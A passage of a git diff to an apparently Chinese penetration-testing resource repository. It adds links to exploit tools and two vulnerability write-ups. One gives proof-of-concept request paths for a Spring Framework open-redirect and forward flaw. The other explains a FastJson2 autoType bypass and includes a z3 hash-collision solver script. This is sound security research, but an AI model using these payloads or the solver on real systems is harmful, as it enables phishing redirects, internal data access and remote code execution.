功能](https://github.com/Muz1K1zuM/kslkatz_bof) +- [HTTP-2-Bomb-Nginx:Nginx HTTP/2 拒绝服务漏洞远程利用工具 (Remote DoS Exploit)](https://github.com/Mr-xn/HTTP-2-Bomb-Nginx) | [相关文献](https://github.com/califio/publications/tree/main/MADBugs/http2-bomb) | [相关文章](https://cybersecuritynews.com/http-2-bomb-remote-dos-exploit/) +- [reverse-skill](https://github.com/zhaoxuya520/reverse-skill):一个面向逆向工程、渗透测试和安全研究的技能路由包,支持 AI 编码助手自动选择合适的工作流和工具链,涵盖 APK、二进制、JS、CTF 等场景。 +- [freellmapi](https://github.com/tashfeenahmed/freellmapi):一个免费 LLM API 聚合服务,提供兼容 OpenAI 的统一接口,可无缝调用多个免费大模型,非常适合个人项目、教学和快速原型开发。 +- [jadx-ai-mcp](https://github.com/zinja-coder/jadx-ai-mcp):为 Jadx 提供 MCP 扩展,使 AI 工具能够直接调用本地 Jadx 进行 APK/DEX 反编译、搜索与分析,是构建 AI 驱动逆向工作流的关键组件。 +- [NebulaPulsar](https://github.com/iss4cf0ng/NebulaPulsar):一个 Java/C# WebShell 漏洞利用与植入工具,作为 Alien 项目的概念验证(PoC),适用于安全研究与漏洞利用实验。 +- [Sherlock](https://github.com/sherlock-project/sherlock) 是一款知名的 OSINT(开源情报)工具,可根据用户名在 400 多个社交平台和网站中快速检索关联账号,广泛应用于网络安全、数字取证和数字身份分析等场景。 【1-6cddc9】【2-d3117e】 +- [Aliens Eye](https://github.com/arxhr007/Aliens_eye) 是一款基于 AI 的 OSINT 用户名扫描工具,支持在 840 多个平台中搜索关联账号,并结合机器学习与启发式检测技术提升识别准确率,适用于网络安全研究和在线身份画像分析。 【3-0542c5】【4-66d668】 +- [Upload_Auto_Fuzz](https://github.com/fewftybet/Upload_Auto_Fuzz) 是一个用于自动化测试 Web 上传接口安全性的脚本工具,主要用于发现文件上传功能中的漏洞,例如任意文件上传、后缀绕过、MIME 绕过、黑名单绕过等。它属于渗透测试辅助工具,用来对目标站点的上传点进行批量 fuzz。 + + ## 文章/书籍/教程相关 @@ -2315,7 +2486,7 @@ - [特权提升技术总结之Windows文件服务内核篇(主要是在webshell命令行执行各种命令搜集信息)](https://xz.aliyun.com/t/7261)|[(项目留存PDF版本)](./books/特权提升技术总结之Windows文件服务内核篇%20-%20先知社区.pdf) - [WellCMS 2.0 Beta3 后台任意文件上传](./books/WellCMS%202.0%20Beta3%20后台任意文件上传.pdf) - [国外详细的CTF分析总结文章(2014-2017年)](https://github.com/ctfs) -- [这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码](./books/这是一篇"不一样"的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码-%20奇安信A-TEAM技术博客.pdf)|[原文地址](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/) +- [这是一篇“不一样”的真实渗透测试案例分析文章-从discuz的后台getshell到绕过卡巴斯基获取域控管理员密码](./books/这是一篇)|[原文地址](https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/) - [表达式注入.pdf](./books/表达式注入.pdf) - [WordPress ThemeREX Addons 插件安全漏洞深度分析](./books/WordPress%20ThemeREX%20Addons%20插件安全漏洞深度分析.pdf) - [通达OA文件包含&文件上传漏洞分析](./books/通达OA文件包含&文件上传漏洞分析.pdf) @@ -2354,7 +2525,7 @@ - [windows权限提升的多种方式](https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842)|[Privilege_Escalation_in_Windows_for_OSCP](./books/Privilege_Escalation_in_Windows_for_OSCP.pdf) - [bypass CSP](https://medium.com/bugbountywriteup/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)|[Content-Security-Policy(CSP)Bypass_Techniques](./books/Content-Security-Policy(CSP)Bypass_Techniques.pdf) - [个人维护的安全知识框架,内容偏向于web](https://github.com/No-Github/1earn) -- [PAM劫持SSH密码](./PAM劫持SSH密码.md) +- [PAM劫持SSH密码](./privesc/PAM劫持SSH密码.md) - [零组资料文库-(需要邀请注册)](https://wiki.0-sec.org/) - [redis未授权个人总结-Mature](./books/redis未授权个人总结-Mature.pdf) - [NTLM中继攻击的新方法](https://www.secureauth.com/blog/what-old-new-again-relay-attack) @@ -2369,7 +2540,7 @@ - [文件上传突破waf总结](./books/文件上传突破waf总结.pdf) - [极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞](./books/极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf)|[原文地址](https://xz.aliyun.com/t/7872) - [代码审计之DTCMS_V5.0后台漏洞两枚](./books/代码审计之DTCMS_V5.0后台漏洞两枚.pdf) -- [快速判断sql注入点是否支持load_file](./快速判断sql注入点是否支持load_file.md) +- [快速判断sql注入点是否支持load_file](./web/快速判断sql注入点是否支持load_file.md) - [文件上传内容检测绕过](./books/文件上传内容检测绕过.md) - [Fastjson_=1.2.47反序列化远程代码执行漏洞复现](./books/Fastjson_=1.2.47反序列化远程代码执行漏洞复现.pdf) - [【Android脱壳】_腾讯加固动态脱壳(上篇)](./books/移动安全(九)_TengXun加固动态脱壳(上篇).pdf) @@ -2893,7 +3064,7 @@ - [记一次绕过阿里云waf与某不知名waf的双waf上传getshell](./books/记一次绕过阿里云waf与某不知名waf的双waf上传getshell.html) - [针对Green VPN及加密文件的逆向实战分析](./books/针对Green%20VPN及加密文件的逆向实战分析.html) - [瑞星企业终端防病毒系统简单分析](./books/瑞星企业终端防病毒系统简单分析.html) -- [从Todesk多个漏洞浅谈远程连接程序溯源反制 ](./books/从Todesk多个漏洞浅谈远程连接程序溯源反制%20.html) +- [从Todesk多个漏洞浅谈远程连接程序溯源反制](./books/从Todesk多个漏洞浅谈远程连接程序溯源反制%20.html) - [如何快速复现挖掘一个漏洞?CodeAuditAssistant高阶技巧](./books/如何快速复现挖掘一个漏洞?CodeAuditAssistant高阶技巧.pdf) - [未授权服务加固与泛解析字符绕过](./books/未授权服务加固与泛解析字符绕过.html) - [飞塔防火墙漏洞深度利用及调试环境搭建](./books/飞塔防火墙漏洞深度利用及调试环境搭建.html) @@ -2944,8 +3115,9 @@ - [上ORM也没用!手注击穿ORM到后台](./books/上ORM也没用!手注击穿ORM到后台.html) - [Tomcat解析XML引入的新颖webshell构造方式](./books/Tomcat解析XML引入的新颖webshell构造方式.html) - [【补天白帽黑客城市沙龙-西安站】c3p0新链探索—深入挖掘数据库连接池的安全隐患](./books/【补天白帽黑客城市沙龙-西安站】c3p0新链探索—深入挖掘数据库连接池的安全隐患.html) - - +- [终极代码审计全维度清单](https://gist.github.com/Mr-xn/2af3b138cb07ca7dd3754afc3b615953) +- [FastJson2 Hash 碰撞 RCE 分析与复现](./books/FastJson2%20Hash%20碰撞%20RCE%20分析与复现.md) | [备份HTML版本](./books/FastJson2%20Hash%20碰撞%20RCE%20分析与复现.html)| [Fastjson2 泛型擦除下的 autoType 绕过](./books/Fastjson2%20泛型擦除下的%20autoType%20绕过.md) | [手撕 FastJson 1.2.83 RCE 原理](./books/手撕%20FastJson%201.2.83%20RCE%20原理.md) | [从 checkAutoType 到 defineClass:fastjson 1.2.83 @JSONType 注解探测链的完整逆向与利用](./books/从%20checkAutoType%20到%20defineClass:fastjson%201.2.83%20@JSONType%20注解探测链的完整逆向与利用.md) +- [CVE-2026-41844 Spring Framework 开放重定向漏洞浅析](./books/CVE-2026-41844%20Spring%20Framework%20开放重定向漏洞浅析.md) ## 说明 @@ -2967,8 +3139,8 @@ ## Stargazers over time -[](https://starchart.cc/Mr-xn/Penetration_Testing_POC) + ### 最后,选一个屁股吧! - \ No newline at end of file + diff --git a/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf b/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf new file mode 100644 index 000000000..7a53224b7 Binary files /dev/null and b/books/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf differ diff --git "a/books/CVE-2026-41844 Spring Framework \345\274\200\346\224\276\351\207\215\345\256\232\345\220\221\346\274\217\346\264\236\346\265\205\346\236\220.md" "b/books/CVE-2026-41844 Spring Framework \345\274\200\346\224\276\351\207\215\345\256\232\345\220\221\346\274\217\346\264\236\346\265\205\346\236\220.md" new file mode 100644 index 000000000..cacc45f5c --- /dev/null +++ "b/books/CVE-2026-41844 Spring Framework \345\274\200\346\224\276\351\207\215\345\256\232\345\220\221\346\274\217\346\264\236\346\265\205\346\236\220.md" @@ -0,0 +1,219 @@ +# CVE-2026-41844 Spring Framework 开放重定向漏洞浅析 +> QIANXIN Team +> 来源:https://forum.butian.net/share/4951 + +# 0x00 CVE-2026-41844 + + +**主要影响范围:** + +Spring Framework: + +- 7.0.0 - 7.0.7 +- 6.2.0 - 6.2.18 +- 6.1.0 - 6.1.27 +- 5.3.0 - 5.3.48 + +以及不再支持维护的版本同样受到影响。 + +# 0x01 漏洞分析与复现 + +## 1.1 分析过程 + +以spring-webmvc 6.0.7为例。 + +当Spring MVC接收到请求时,Servlet容器会调用DispatcherServlet的service方法(方法的实现在其父类FrameworkServlet中定义): + + + +经过一系列的处理后,会调用doDispatch方法处理: + + + +在doDispatch方法中,经过一系列处理获取到url 和 Handler 映射关系后(HandlerAdapter),springMVC就可以根据请求的uri来找到对应的Controller和method,然后处理和响应请求。详细的分析可见[https://forum.butian.net/share/2214](https://forum.butian.net/share/2214) + + + +找到对应的HandlerAdapter后,会调用对应的Handler方法,也就是执行Controller里的业务逻辑了,执行完成之后会返回一个ModleAndView对象,然后渲染视图并进行返回,这里的逻辑是本次漏洞的分析的关键: + + + +在获取到ModelAndView对象后,这里会调用applyDefaultViewName处理,这里是Spring 的默认视图解析逻辑: + + + +查看具体的代码逻辑,首先检查 mv 是否为 null(如果代码添加了 `@ResponseBody` 注解,mv 就为 null),然后判断 mv 中是否包含视图,如果对应的Controller代码中未显式指定视图名时,则调用 getDefaultViewName 方法去获取默认的视图名,并将获取到的默认视图名赋值给 mv: + + + +查看getDefaultViewName,看看具体获取默认视图名的逻辑: + + + +这里会继续调用viewNameTranslator#getViewName方法对请求进行处理。 + +viewNameTranslator 其实是 RequestToViewNameTranslator: + + + + + +本质上,在 SpringMVC 中,RequestToViewNameTranslator 接口只有一个默认的实现类DefaultRequestToViewNameTranslator,WebFlux 则是ViewResolutionResultHandler 。 + +在DefaultRequestToViewNameTranslator#getViewName方法中,**会从请求路径中直接提取字符串作为视图名**: + + + +ServletRequestPathUtils#getCachedPathValue方法是统一获取请求路径的方法。具体的解析可见[https://forum.butian.net/share/2606。](https://forum.butian.net/share/2606%E3%80%82) + +提取完请求路径后,会通过 transformPath 方法对路径进行处理,再分别加上前后缀后返回,默认的前后缀都是空字符串(如有需要,也可以进行配置)。 + +transformPath 方法则主要功能如下: + +1. 去掉路径开始的 `/` +2. 去掉路径结尾的 `/` +3. 如果请求路径有扩展名,则去掉扩展名,例如请求路径是 `/1.txt`,经过这一步处理后,就变成了 `/1` + + + + + +4. 如果 separator 与 SLASH 不同,则替换原来的分隔符(一般情况下,默认是相同的)。 + + + +这里以如下Controller为例: + +```java +@GetMapping("/**") +public void catchAll() { + +} +``` + +当正常请求/demo时,可以看到,因为没有显示指定视图,所以ModelAndView对象里的内容均为null: + + + +经过applyDefaultViewName方法处理后,取得对应的视图名,也就是默认的请求路径demo: + + + +这里也就得到了漏洞的第一个成因:**当 Spring MVC 或 Spring WebFlux 应用未显式指定视图名时,视图名会默认从请求路径提取。** + +处理完上述的一系列逻辑后,会调用processDispatchResult()进行异常处理、请求状态及触发请求完成事件,视图的渲染工作则交给了render()方法: + + + + + +render()渲染过程中,如果ModelAndView中的viewName不为空,则调用resolveViewName从视图解析器获取对应的视图对象;否则使用ModelAndView#getview方法获取视图对象。 + + + +这里会进一步调用getCandidateViews方法进行处理,然后遍历所有的视图解析器,进行视图的创建与解析: + + + + + +而UrlBasedViewResolver会识别视图名中的特殊前缀,例如`redirect:` 会被解析为重定向,返回 302 响应跳转到后续指定的地址: + + + +至此,CVE-2026-41844的完整链路大致梳理清楚了。下面是具体的漏洞复现过程。 + +## 1.2 漏洞复现 + +以SpringMVC为例: + +相关环境直接使用[https://github.com/andbin/spring-boot3-thymeleaf-basic-demo](https://github.com/andbin/spring-boot3-thymeleaf-basic-demo) 进行验证。 + +根据前面的分析,可以定义一个Controller如下: + +```TypeScript +@Controller +public class MyController { + + @GetMapping("/**") + public void catchAll() { + + } +} +``` + +启动对应的application后,只需访问`http://ip:port/redirect:https://www.attack.com.any`,通过302跳转后即可重定向到`https://www.attack.com` + +注意,根据前面的分析,在通过请求获取默认视图时,如果请求路径有扩展名,则去掉扩展名,这个拓展名会通过结尾最后一个`.`来区分。也就是说类似`www.attack.com`会被处理成`www.attack`,所以在最后构造poc时,要在实际跳转的域名后,增加类似`.any`的后缀,避免截断后无法正常跳转。 + +下面是具体的效果: + + + +forward的转发同理,先定义一个转发的目标: + +```TypeScript + +@GetMapping("/internal/secret") +@ResponseBody public String internalEndpoint() { + return "[敏感信息] 内部系统配置接口,仅内网可访问"; +} +``` + +只需请求`http://ip:port/forward:/internal/secret`即可成功转发: + + + +Spring WebFlux同理,这里就不再赘述了。 +另外,WebFlux 原生不支持 `forward:` 内部转发,因此仅受 `redirect:` 开放重定向影响。 + +## 1.3 {\*spring}模式 + +在官方的漏洞通告中,仅仅提到了`/**`的场景,实际上Spring5及之后的PathPattern解析模式,还支持类似`{*spring}`的写法,与`/**`大同小异,那么是否也会存在风险呢? + +查看官方文档: + +Representation of a parsed path pattern. Includes a chain of path elements for fast matching and accumulates computed state for quick comparison of patterns. + +`PathPattern` matches URL paths using the following rules: + +- `?` matches one character +- `*` matches zero or more characters within a path segment +- `**` matches zero or more _path segments_ until the end of the path +- `{spring}` matches a _path segment_ and captures it as a variable named "spring" +- `{spring:[a-z]+}` matches the regexp `[a-z]+` as a path variable named "spring" +- `{*spring}` matches zero or more _path segments_ until the end of the path and captures it as a variable named "spring" + +**Note:** In contrast to `[AntPathMatcher](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/util/AntPathMatcher.html)`, `**` is supported only at the end of a pattern. For example, `/pages/{}` is valid but `/pages/{}/details` is not. The same applies also to the capturing variant `{*spring}`. The aim is to eliminate ambiguity when comparing patterns for specificity. + +根据官方文档的描述,其实`**`跟AntPathMatcher匹配规则区别不大,PathPattern在保持其匹配规则的基础上,新增了`{*spring}`的语法支持。 + +`{*spring}`表示匹配余下的path路径部分并将其赋值给名为spring的变量(变量名可以根据实际情况随意命名,与`@PathVariable`名称对应即可)。同时,`{*spring}`是可以匹配剩余所有path的,类似`/**`,只是功能更强,可以获取到这部分动态匹配到的内容。 + +```TypeScript +@GetMapping("/{*path}") +public void catchAll() { + +} +``` + +可以发现,同样成功利用,这里与`/**`的配置区别只是解析模式的不同,不影响具体的漏洞触发: + + + +# 0x02 利用条件 + +综上所述,相关漏洞的利用条件可以总结如下: + +1. 使用 Spring MVC 或 Spring WebFlux 框架 +2. 配置了类似 `/**` 通配符路径与`{*path}`映射(如全局视图路由) +3. 对应路径的处理器未显式指定视图名称,依赖 Spring 自动从请求路径推导 +4. 使用了继承自 `UrlBasedViewResolver` 的视图解析器(Thymeleaf等主流视图技术默认均满足) + +# 0x03 修复方案 + +官方具体修复如下:[https://github.com/spring-projects/spring-framework/blob/v6.2.19/spring-webmvc/src/main/java/org/springframework/web/servlet/view/DefaultRequestToViewNameTranslator.java](https://github.com/spring-projects/spring-framework/blob/v6.2.19/spring-webmvc/src/main/java/org/springframework/web/servlet/view/DefaultRequestToViewNameTranslator.java) + +通过请求获取完视图名后,新增对 `redirect:`、`forward:` 两个危险前缀的开头匹配校验。当匹配到危险前缀时直接抛出非法参数异常,由 Spring MVC 异常处理器转为 `400 Bad Request` 响应: + + diff --git "a/books/FastJson2 Hash \347\242\260\346\222\236 RCE \345\210\206\346\236\220\344\270\216\345\244\215\347\216\260.html" "b/books/FastJson2 Hash \347\242\260\346\222\236 RCE \345\210\206\346\236\220\344\270\216\345\244\215\347\216\260.html" new file mode 100644 index 000000000..6ec3eb20b --- /dev/null +++ "b/books/FastJson2 Hash \347\242\260\346\222\236 RCE \345\210\206\346\236\220\344\270\216\345\244\215\347\216\260.html" @@ -0,0 +1,1094 @@ + +
+ + +++来源:https://xz.aliyun.com/news/92608
+
参考: https://mp.weixin.qq.com/s/LJaul1jNjK9pXRAkoUiMEA, 来跟进一下漏洞原理.
+测试使用的依赖:
+<dependencies>
+ <!-- fastjson2 核心 -->
+ <dependency>
+ <groupId>com.alibaba.fastjson2</groupId>
+ <artifactId>fastjson2</artifactId>
+ <version>2.0.53</version>
+ </dependency>
+</dependencies>
+总结一下 FastJson2 下的 autotype 如何使用, 首先是指明第二个参数为一个 JavaBean 的场景, 传参不使用 autotype:
+// ────────────────────────────────────────────────────────────
+// 1. 基础反序列化: 把 JSON 字符串解析成 Java 对象
+// ────────────────────────────────────────────────────────────
+String json = "{\"name\":\"admin\",\"age\":28,\"email\":\"admin@lab.local\"}";
+User user = JSON.parseObject(json, User.class);
+System.out.println("[1] 基础反序列化:");
+System.out.println(" 输入: " + json);
+System.out.println(" 输出: " + user);
+System.out.println();
+
+// ────────────────────────────────────────────────────────────
+// 2. 基础序列化: 把 Java 对象转回 JSON 字符串
+// ────────────────────────────────────────────────────────────
+String reJson = JSON.toJSONString(user);
+System.out.println("[2] 基础序列化:");
+System.out.println(" 输入: " + user);
+System.out.println(" 输出: " + reJson);
+System.out.println();
+
+/*
+[1] 基础反序列化:
+ 输入: {"name":"admin","age":28,"email":"admin@lab.local"}
+ 输出: User{name='admin', age=28, email='admin@lab.local'}
+
+[2] 基础序列化:
+ 输入: User{name='admin', age=28, email='admin@lab.local'}
+ 输出: {"age":28,"email":"admin@lab.local","name":"admin"}
+*/
+当然如果使用带 @type 的场景, 如下:
+String jsonWithType = "{\"@type\":\"com.heihu577.model.User\",\"name\":\"alice\",\"age\":25,\"email\":\"alice@lab.local\"}";
+
+// 不指定目标类,解析成 JSONObject
+Object obj = JSON.parse(jsonWithType);
+System.out.println("[3] 带 @type 的 JSON, 不开启 SupportAutoType:");
+System.out.println(" 输入: " + jsonWithType);
+System.out.println(" 解析结果类型: " + obj.getClass().getName());
+System.out.println(" 解析结果: " + obj);
+if (obj instanceof JSONObject) {
+ JSONObject jo = (JSONObject) obj;
+ System.out.println(" @type 字段值: " + jo.getString("@type"));
+ System.out.println(" ↑ @type 被当作普通字段保留了,没有触发类加载");
+}
+System.out.println();
+/*
+[3] 带 @type 的 JSON, 不开启 SupportAutoType:
+ 输入: {"@type":"com.heihu577.model.User","name":"alice","age":25,"email":"alice@lab.local"}
+ 解析结果类型: com.alibaba.fastjson2.JSONObject
+ 解析结果: {"@type":"com.heihu577.model.User","name":"alice","age":25,"email":"alice@lab.local"}
+ @type 字段值: com.heihu577.model.User
+ ↑ @type 被当作普通字段保留了,没有触发类加载
+*/
+默认会反序列化成com.alibaba.fastjson2.JSONObject类对象, 除非第二个参数指明为一个 JavaBean:
+User u2 = JSON.parseObject(jsonWithType, User.class);
+System.out.println("[4] 带 @type 的 JSON, 指定目标类 User.class (不开 SupportAutoType):");
+System.out.println(" 输入: " + jsonWithType);
+System.out.println(" 输出: " + u2);
+System.out.println(" ↑ 反序列化成功,但 @type 字段被忽略 (User 没有 @type 属性)");
+System.out.println();
+
+/*
+[4] 带 @type 的 JSON, 指定目标类 User.class (不开 SupportAutoType):
+ 输入: {"@type":"com.heihu577.model.User","name":"alice","age":25,"email":"alice@lab.local"}
+ 输出: User{name='alice', age=25, email='alice@lab.local'}
+*/
+根据当前解析结果来看, fastjson2 是能够正常解析@type字段的, 只不过若不指明第二个参数则会先被转化为JSONObject, 对原有的 JSON 对 User 类打上断点查看一番:
+
那么必然与 fastjson 1.x 的处理逻辑相同, 通过字节码编辑技术在内存中定义了字节码信息, 这里有两种思路定位到字节码文件:
+●通过 arthas 将该类的字节码导出
+●找到更深层次 ASM 操作部分, 将字节码写入到硬盘进行反编译
+通过思路 2, 最终调用栈如下:
+at com.alibaba.fastjson2.reader.ObjectReaderCreatorASM.jitObjectReader(ObjectReaderCreatorASM.java:594)
+at com.alibaba.fastjson2.reader.ObjectReaderCreatorASM.createObjectReader(ObjectReaderCreatorASM.java:327)
+at com.alibaba.fastjson2.reader.ObjectReaderProvider.getObjectReaderInternal(ObjectReaderProvider.java:845)
+at com.alibaba.fastjson2.reader.ObjectReaderProvider.getObjectReader(ObjectReaderProvider.java:763)
+at com.alibaba.fastjson2.JSON.parseObject(JSON.java:858)
+at com.heihu577.demo.Demo01Basic.run(Demo01Basic.java:29)
+at com.heihu577.demo.Demo01Basic.main(Demo01Basic.java:17)
+导出一波:
+
最终我们可以看到字节码信息:
+
这里说明一下实验时失败的尝试(ASM 输出并没有携带行号信息导致无法 Debug), 首先将导出出来的字节码符合包名结构, 保存到 jar 中:
+
随后增加 classpath, 并且将其置顶:
+
但是由于该字节码由 ASM 生成, 导致不存在行号信息, 可以安装: https://github.com/Col-E/Recaf/releases/tag/4.0.0-alpha 中的recaf-launcher-gui-0.8.8.jar来进行修复行号, 需要注意的是首次运行需要要求安装依赖库(javaFX 等), 使用 proxychains4 运行该 jar 进行安装可加快速度. 但在实际场景中发现反编译存在错误信息:
+
正常会调用该字节码的 readObject 方法, 并且整个 ASM 中不存在反射的逻辑:
+
但部分方法会调用 checkAutoType:
+
参考: https://mp.weixin.qq.com/s/4jl2kv_JRSDUAUZyc1jw5A, 官网的 commit 记录中存在对 payload 的测试记录:
+
可以看到期望类定义为了 Object, Debug 看一下:
+package com.heihu577.demo;
+
+import com.alibaba.fastjson2.JSON;
+
+public class Demo {
+ public static void main(String[] args) {
+ String jsonWithType = "{\"@type\":\"com.heihu577.model.User\",\"name\":\"alice\",\"age\":25,\"email\":\"alice@lab.local\"}";
+
+ // 指明类型为 Object.class
+ Object obj = JSON.parseObject(jsonWithType, Object.class);
+ System.out.println(obj);
+ }
+}
+调用栈为:
+at com.alibaba.fastjson2.reader.ObjectReaderProvider.checkAutoType(ObjectReaderProvider.java:554)
+at com.alibaba.fastjson2.reader.ObjectReaderProvider.getObjectReader(ObjectReaderProvider.java:530)
+at com.alibaba.fastjson2.JSONReader$Context.getObjectReaderAutoType(JSONReader.java:4194)
+at com.alibaba.fastjson2.reader.ObjectReaderImplObject.readObject(ObjectReaderImplObject.java:119)
+at com.alibaba.fastjson2.JSON.parseObject(JSON.java:864)
+at com.heihu577.demo.Demo.main(Demo.java:10)
+可以看到这里并不是主动生成的 ASM, 当期望类指明为Object时而是系统提供的ObjectReaderImplObject类, 由provider.getObjectReader选择而来:
+
在ObjectReaderImplObject::readObject反序列化流程中会判断是否开启了 checkAutoType:
+
随后经过调用栈:
+at com.alibaba.fastjson2.reader.ObjectReaderProvider.checkAutoType(ObjectReaderProvider.java:554)
+at com.alibaba.fastjson2.reader.ObjectReaderProvider.getObjectReader(ObjectReaderProvider.java:530)
+at com.alibaba.fastjson2.JSONReader$Context.getObjectReaderAutoType(JSONReader.java:4194)
+at com.alibaba.fastjson2.reader.ObjectReaderImplObject.readObject(ObjectReaderImplObject.java:119)
+at com.alibaba.fastjson2.JSON.parseObject(JSON.java:864)
+at com.heihu577.demo.Demo.main(Demo.java:10)
+可以看到能够正常走到checkAutoType方法中, 该方法中如果发现开启了 SafeMode 则直接 null(漏洞缓解措施, 默认不开启):
+
而后面的逻辑存在一个黑白名单校验的缺陷:
+
即使没有开启 autotype 功能, 同样会进入 hash 比较的逻辑, 那么如果这里的 hash 能够被暴力破解或其他手段猜测出来(由于这里 Hash 值的判断是根据结果进行判断,而过程中不同的字符参与异或|乘法运算是会存在冲突的结果的), 那么则会进入 loadClass 逻辑:
+
又是一段经典的 ClassLoader::loadClass, 与fastjson 1.2.83中的原理相同. 若该 ClassLoader 为 SpringBoot 的 URLClassLoader 即可进行远程类加载.
+参考: https://zhuanlan.zhihu.com/p/30548907 & https://ctf-wiki.org/reverse/tools/constraint/z3/ & https://www.freebuf.com/articles/web/232002.html
+由于 FNV 算法使用了^= & *=进行做位运算, 所以能列成方程组来解表达式:
+#!/usr/bin/env python3
+"""
+FNV-1a 64 位哈希碰撞求解器 (z3)
+
+对标 fastjson2 2.0.53 Fnv.hashCode64 的实现:
+ - 长字符串 (>8 字符) 或含字符 >255: 走 FNV-1a
+ - FNV-1a: hash = (hash ^ ch) * prime
+ - offset = 0xcbf29ce484222325
+ - prime = 0x100000001b3
+
+用法:
+ python3 fnv_collision.py <目标hash> [字符数] [最小字符] [最大字符]
+
+参数:
+ 目标hash : 十进制 (可负) 或 0x 开头的十六进制
+ 字符数 : 默认 5
+ 最小字符 : 默认 256 (确保 >255, 触发 FNV-1a)
+ 最大字符 : 默认 65535 (Java char 上限)
+
+示例:
+ python3 fnv_collision.py 0xd5ef36df67371111
+ python3 fnv_collision.py -6293031534589903644
+ python3 fnv_collision.py 15415600382649766161 5 256 65535
+
+依赖:
+ pip3 install z3-solver
+"""
+import sys
+from z3 import *
+
+# FNV-1a 64 位常量
+OFFSET = 0xcbf29ce484222325
+PRIME = 0x100000001b3
+
+
+def parse_hash(s):
+ """解析 hash 参数: 支持十进制 (可负) 和十六进制 (0x开头)"""
+ s = s.strip()
+ if s.lower().startswith('0x'):
+ v = int(s, 16)
+ # 转成有符号 long (Java long 是有符号 64 位)
+ if v >= 2**63:
+ v -= 2**64
+ return v
+ return int(s)
+
+
+def to_unsigned(v):
+ """有符号 long -> 无符号"""
+ return v & 0xFFFFFFFFFFFFFFFF
+
+
+def fnv1a_hash(s):
+ """计算 FNV-1a hash (跟 fastjson2 2.0.53 长字符串分支一致)"""
+ h = OFFSET
+ for ch in s:
+ h ^= ord(ch)
+ h = (h * PRIME) & 0xFFFFFFFFFFFFFFFF
+ return h
+
+
+def solve(target_hash, num_chars=5, min_char=256, max_char=65535):
+ """
+ 用 z3 求 N 字符碰撞
+
+ target_hash: 目标 hash (有符号 long)
+ num_chars: 字符数
+ min_char: 字符最小值 (256 确保触发 FNV-1a)
+ max_char: 字符最大值 (65535 = Java char 上限)
+ """
+ target_unsigned = to_unsigned(target_hash)
+
+ # 创建 num_chars 个 64 位 BitVec 变量
+ c = [BitVec(f'c{i}', 64) for i in range(num_chars)]
+
+ # FNV-1a 计算
+ h = BitVecVal(OFFSET, 64)
+ for i in range(num_chars):
+ h = (h ^ c[i]) * BitVecVal(PRIME, 64)
+
+ # 求解器
+ s = Solver()
+ s.add(h == BitVecVal(target_unsigned, 64))
+
+ # 字符范围约束
+ for i in range(num_chars):
+ s.add(c[i] >= min_char)
+ s.add(c[i] <= max_char)
+ # ★ 排除 UTF-16 代理对范围 (0xD800-0xDFFF)
+ # 这些码点专用于 UTF-16 编码,不能作为独立字符
+ # Python chr() 能产生但 print 时 UTF-8 不允许
+ s.add(Or(c[i] < 0xD800, c[i] > 0xDFFF))
+
+ # 如果字符范围包含 <=255 且 num_chars <=8, 需要至少一个 >255 强制走 FNV-1a
+ if min_char <= 255 and num_chars <= 8:
+ s.add(Or([c[i] > 255 for i in range(num_chars)]))
+
+ # 求解
+ result = s.check()
+ if result == sat:
+ m = s.model()
+ return [m[c[i]].as_long() for i in range(num_chars)]
+ return None
+
+
+def main():
+ if len(sys.argv) < 2:
+ print(__doc__)
+ sys.exit(1)
+
+ # 解析参数
+ target_hash = parse_hash(sys.argv[1])
+ num_chars = int(sys.argv[2]) if len(sys.argv) > 2 else 5
+ min_char = int(sys.argv[3]) if len(sys.argv) > 3 else 256
+ max_char = int(sys.argv[4]) if len(sys.argv) > 4 else 65535
+
+ print("═" * 64)
+ print(" FNV-1a 64 位哈希碰撞求解器 (z3)")
+ print("═" * 64)
+ print()
+ print(f" 目标 hash (有符号): {target_hash}")
+ print(f" 目标 hash (无符号): {to_unsigned(target_hash)}")
+ print(f" 目标 hash (十六进制): 0x{to_unsigned(target_hash):016x}")
+ print()
+ print(f" 字符数: {num_chars}")
+ print(f" 字符范围: [{min_char}, {max_char}]")
+ if min_char <= 255:
+ print(f" ⚠ 范围含 <=255, 会强制至少一个字符 >255 (走 FNV-1a)")
+ print()
+
+ # 求解
+ print(" 求解中...")
+ import time
+ start = time.time()
+ result = solve(target_hash, num_chars, min_char, max_char)
+ elapsed = time.time() - start
+
+ if result is None:
+ print(f" ✗ 未找到解 (unsat), 耗时 {elapsed:.2f}s")
+ print()
+ print(" 可能原因:")
+ print(" 1. 输入空间太小 (字符数 × 位宽 < 64)")
+ print(" 2. z3 求解超时 (尝试减少字符数)")
+ print(" 3. 真的无解 (极少见)")
+ return
+
+ print(f" ✓ 找到解! 耗时 {elapsed:.2f}s")
+ print()
+
+ # 构造碰撞字符串
+ collision_str = ''.join(chr(c) for c in result)
+
+ # 验证
+ actual_hash = fnv1a_hash(collision_str)
+
+ print("─" * 64)
+ print(" 碰撞结果")
+ print("─" * 64)
+ print()
+ print(f" 原始目标 hash: 0x{to_unsigned(target_hash):016x}")
+ print(f" 碰撞字符串 hash: 0x{to_unsigned(actual_hash):016x}")
+ print(f" 匹配: {'✓' if to_unsigned(actual_hash) == to_unsigned(target_hash) else '✗'}")
+ print()
+ print(f" Code Points: {result}")
+ print(f" 十六进制: [{', '.join(f'0x{c:04x}' for c in result)}]")
+ print(f" Unicode 转义: {''.join(f'\\u{c:04x}' for c in result)}")
+ # 安全打印: 避免代理对/控制字符导致 UnicodeEncodeError
